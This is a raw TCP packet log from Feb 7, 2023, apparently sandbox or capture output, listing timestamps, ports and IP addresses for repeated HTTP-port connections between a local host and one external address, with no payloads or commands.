Feb 7, 2023 19:57:49.176765919 CET	80	49858	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:49.176975965 CET	49858	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:49.291776896 CET	49858	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:49.292644024 CET	49859	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:49.354551077 CET	80	49858	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:49.354669094 CET	80	49859	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:49.354830980 CET	49858	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:49.354878902 CET	49859	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:49.355360985 CET	49859	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:49.416363955 CET	80	49859	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:49.419018030 CET	80	49859	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:49.421331882 CET	49859	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:49.531618118 CET	49859	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:49.532490015 CET	49860	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:49.592938900 CET	80	49859	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:49.594604015 CET	49859	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:49.595474958 CET	80	49860	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:49.595652103 CET	49860	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:49.596112013 CET	49860	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:49.657627106 CET	80	49860	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:49.660384893 CET	80	49860	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:49.660535097 CET	49860	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:49.784919024 CET	49860	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:49.785562038 CET	49861	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:49.846940994 CET	80	49860	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:49.847665071 CET	80	49861	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:49.847790003 CET	49860	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:49.847837925 CET	49861	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:49.861421108 CET	49861	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:49.922144890 CET	80	49861	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:49.924356937 CET	80	49861	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:49.924530029 CET	49861	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:50.041786909 CET	49861	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:50.042490005 CET	49862	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:50.102574110 CET	80	49861	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:50.103538990 CET	49861	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:50.104005098 CET	80	49862	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:50.104131937 CET	49862	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:50.104681969 CET	49862	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:50.166232109 CET	80	49862	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:50.169972897 CET	80	49862	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:50.171493053 CET	49862	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:50.299304008 CET	49862	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:50.300399065 CET	49863	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:50.361063004 CET	80	49862	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:50.361295938 CET	49862	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:50.364584923 CET	80	49863	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:50.364782095 CET	49863	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:50.367777109 CET	49863	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:50.429322004 CET	80	49863	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:50.431555033 CET	80	49863	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:50.431734085 CET	49863	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:50.540960073 CET	49863	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:50.541944981 CET	49864	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:50.602488995 CET	80	49864	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:50.602530956 CET	80	49863	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:50.602736950 CET	49863	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:50.603481054 CET	49864	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:50.603717089 CET	49864	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:50.664097071 CET	80	49864	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:50.666523933 CET	80	49864	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:50.666734934 CET	49864	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:50.775794983 CET	49864	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:50.777770996 CET	49865	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:50.837599039 CET	80	49864	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:50.837805033 CET	49864	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:50.840050936 CET	80	49865	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:50.840264082 CET	49865	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:50.851457119 CET	49865	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:50.913919926 CET	80	49865	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:50.916224957 CET	80	49865	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:50.916366100 CET	49865	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:51.026004076 CET	49865	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:51.027004004 CET	49866	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:51.086425066 CET	80	49866	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:51.086518049 CET	80	49865	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:51.086565971 CET	49866	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:51.086606026 CET	49865	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:51.087084055 CET	49866	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:51.146636009 CET	80	49866	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:51.150449991 CET	80	49866	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:51.150532961 CET	49866	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:51.259979010 CET	49866	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:51.261075974 CET	49867	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:51.319591045 CET	80	49866	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:51.319758892 CET	49866	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:51.322613955 CET	80	49867	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:51.322791100 CET	49867	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:51.323673010 CET	49867	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:51.385050058 CET	80	49867	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:51.387584925 CET	80	49867	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:51.387777090 CET	49867	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:51.501271009 CET	49867	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:51.502162933 CET	49868	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:51.562613010 CET	80	49868	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:51.562732935 CET	49868	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:51.562966108 CET	80	49867	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:51.563060045 CET	49867	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:51.563260078 CET	49868	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:51.624475956 CET	80	49868	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:51.627196074 CET	80	49868	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:51.627290964 CET	49868	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:51.744291067 CET	49868	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:51.745563030 CET	49869	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:51.805252075 CET	80	49868	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:51.805365086 CET	49868	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:51.806952000 CET	80	49869	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:51.807121038 CET	49869	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:51.811173916 CET	49869	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:51.872682095 CET	80	49869	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:51.875149965 CET	80	49869	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:51.875257015 CET	49869	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:51.985045910 CET	49869	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:51.986011028 CET	49870	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:52.046684027 CET	80	49870	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:52.046753883 CET	80	49869	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:52.046955109 CET	49870	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:52.046991110 CET	49869	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:52.051772118 CET	49870	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:52.112469912 CET	80	49870	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:52.117147923 CET	80	49870	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:52.117325068 CET	49870	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:52.230139017 CET	49870	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:52.231101990 CET	49871	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:52.290864944 CET	80	49870	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:52.291719913 CET	49870	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:52.292690039 CET	80	49871	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:52.295758009 CET	49871	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:52.296228886 CET	49871	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:52.357469082 CET	80	49871	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:52.360213041 CET	80	49871	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:52.363742113 CET	49871	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:52.481518030 CET	49871	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:52.482439995 CET	49873	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:52.543041945 CET	80	49871	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:52.543920040 CET	80	49873	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:52.544079065 CET	49871	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:52.544138908 CET	49873	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:52.544612885 CET	49873	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:52.606362104 CET	80	49873	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:52.608648062 CET	80	49873	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:52.608845949 CET	49873	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:52.715415001 CET	49873	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:52.716115952 CET	49874	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:52.776659012 CET	80	49874	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:52.777014971 CET	80	49873	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:52.777183056 CET	49873	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:52.779263973 CET	49874	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:52.779347897 CET	49874	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:52.840153933 CET	80	49874	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:52.842753887 CET	80	49874	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:52.842864990 CET	49874	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:52.947515011 CET	49874	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:52.948673010 CET	49875	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:53.007889986 CET	80	49874	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:53.009872913 CET	49874	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:53.009927988 CET	80	49875	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:53.010054111 CET	49875	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:53.010906935 CET	49875	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:53.072618961 CET	80	49875	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:53.076116085 CET	80	49875	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:53.077250957 CET	49875	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:53.181710005 CET	49875	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:53.182511091 CET	49876	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:53.244209051 CET	80	49875	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:53.244731903 CET	80	49876	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:53.244890928 CET	49875	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:53.244925022 CET	49876	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:53.245417118 CET	49876	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:53.306606054 CET	80	49876	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:53.308866024 CET	80	49876	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:53.309024096 CET	49876	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:53.416296959 CET	49876	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:53.417229891 CET	49877	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:53.476833105 CET	80	49877	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:53.477034092 CET	49877	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:53.477612972 CET	80	49876	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:53.477721930 CET	49876	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:53.477790117 CET	49877	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:53.537180901 CET	80	49877	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:53.539478064 CET	80	49877	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:53.539660931 CET	49877	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:53.650707960 CET	49877	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:53.651479006 CET	49878	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:53.710927963 CET	80	49877	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:53.711139917 CET	49877	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:53.714406013 CET	80	49878	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:53.714600086 CET	49878	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:53.715010881 CET	49878	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:53.777748108 CET	80	49878	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:53.780524015 CET	80	49878	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:53.780724049 CET	49878	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:53.890275955 CET	49878	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:53.898363113 CET	49879	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:53.952840090 CET	80	49878	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:53.952950001 CET	49878	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:53.959826946 CET	80	49879	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:53.959938049 CET	49879	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:53.960320950 CET	49879	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:54.021723032 CET	80	49879	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:54.024262905 CET	80	49879	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:54.024435043 CET	49879	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:54.141567945 CET	49879	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:54.149926901 CET	49880	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:54.203556061 CET	80	49879	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:54.203763008 CET	49879	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:54.212496996 CET	80	49880	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:54.212744951 CET	49880	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:54.223862886 CET	49880	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:54.287559032 CET	80	49880	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:54.293271065 CET	80	49880	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:54.293407917 CET	49880	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:54.400865078 CET	49880	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:54.401715994 CET	49881	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:54.463771105 CET	80	49880	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:54.463891029 CET	49880	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:54.464199066 CET	80	49881	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:54.464307070 CET	49881	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:54.464876890 CET	49881	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:54.527400970 CET	80	49881	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:54.529468060 CET	80	49881	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:54.529841900 CET	49881	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:54.650747061 CET	49881	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:54.651624918 CET	49882	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:54.712105989 CET	80	49882	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:54.712412119 CET	49882	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:54.713300943 CET	80	49881	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:54.713459969 CET	49881	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:54.716706038 CET	49882	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:54.777965069 CET	80	49882	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:54.780380011 CET	80	49882	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:54.780464888 CET	49882	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:54.900401115 CET	49882	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:54.901283979 CET	49883	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:54.962035894 CET	80	49882	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:54.962186098 CET	49882	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:54.964113951 CET	80	49883	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:54.964258909 CET	49883	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:54.965081930 CET	49883	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:55.028469086 CET	80	49883	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:55.032660961 CET	80	49883	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:55.032761097 CET	49883	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:55.134954929 CET	49883	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:55.135703087 CET	49884	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:55.198184967 CET	80	49883	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:55.198307991 CET	49883	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:55.198991060 CET	80	49884	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:55.199191093 CET	49884	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:55.199528933 CET	49884	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:55.261831999 CET	80	49884	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:55.266089916 CET	80	49884	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:55.268879890 CET	49884	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:55.385071039 CET	49884	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:55.385974884 CET	49885	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:55.445422888 CET	80	49885	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:55.446077108 CET	49885	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:55.447401047 CET	80	49884	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:55.447515965 CET	49884	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:55.454531908 CET	49885	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:55.513978004 CET	80	49885	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:55.516375065 CET	80	49885	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:55.516530991 CET	49885	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:55.619597912 CET	49885	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:55.620546103 CET	49886	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:55.679136992 CET	80	49885	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:55.679297924 CET	49885	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:55.680078983 CET	80	49886	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:55.680186033 CET	49886	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:55.680682898 CET	49886	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:55.740272999 CET	80	49886	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:55.742757082 CET	80	49886	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:55.742906094 CET	49886	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:55.854660034 CET	49886	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:55.855612993 CET	49887	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:55.914674997 CET	80	49886	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:55.915477037 CET	49886	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:55.916891098 CET	80	49887	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:55.918333054 CET	49887	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:55.996114969 CET	49887	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:56.057761908 CET	80	49887	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:56.062107086 CET	80	49887	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:56.068037987 CET	49887	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:56.181844950 CET	49887	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:56.182662010 CET	49888	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:56.243411064 CET	80	49887	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:56.243989944 CET	49887	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:56.244009018 CET	80	49888	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:56.244225025 CET	49888	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:56.245209932 CET	49888	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:56.309228897 CET	80	49888	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:56.309570074 CET	80	49888	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:56.309648991 CET	49888	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:56.420722961 CET	49888	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:56.421581030 CET	49889	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:56.482275009 CET	80	49888	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:56.482459068 CET	49888	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:56.483012915 CET	80	49889	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:56.483139992 CET	49889	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:56.483664036 CET	49889	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:56.545308113 CET	80	49889	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:56.548062086 CET	80	49889	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:56.548242092 CET	49889	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:56.654557943 CET	49889	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:56.655606985 CET	49890	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:56.716445923 CET	80	49889	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:56.716590881 CET	49889	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:56.717773914 CET	80	49890	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:56.717981100 CET	49890	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:56.718242884 CET	49890	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:56.780400991 CET	80	49890	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:56.782778978 CET	80	49890	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:56.782927990 CET	49890	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:56.884809971 CET	49890	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:56.885624886 CET	49891	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:56.947170019 CET	80	49891	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:56.947205067 CET	80	49890	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:56.947340012 CET	49890	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:56.947355032 CET	49891	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:56.954066992 CET	49891	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:57.016032934 CET	80	49891	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:57.018559933 CET	80	49891	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:57.018685102 CET	49891	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:57.135364056 CET	49891	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:57.138524055 CET	49892	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:57.197433949 CET	80	49891	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:57.197525024 CET	49891	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:57.199728966 CET	80	49892	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:57.199881077 CET	49892	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:57.200519085 CET	49892	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:57.260942936 CET	80	49892	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:57.264421940 CET	80	49892	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:57.264620066 CET	49892	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:57.370192051 CET	49892	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:57.371264935 CET	49893	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:57.430881023 CET	80	49892	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:57.431008101 CET	49892	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:57.433610916 CET	80	49893	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:57.433773041 CET	49893	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:57.434156895 CET	49893	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:57.496387959 CET	80	49893	62.204.41.4	192.168.2.5
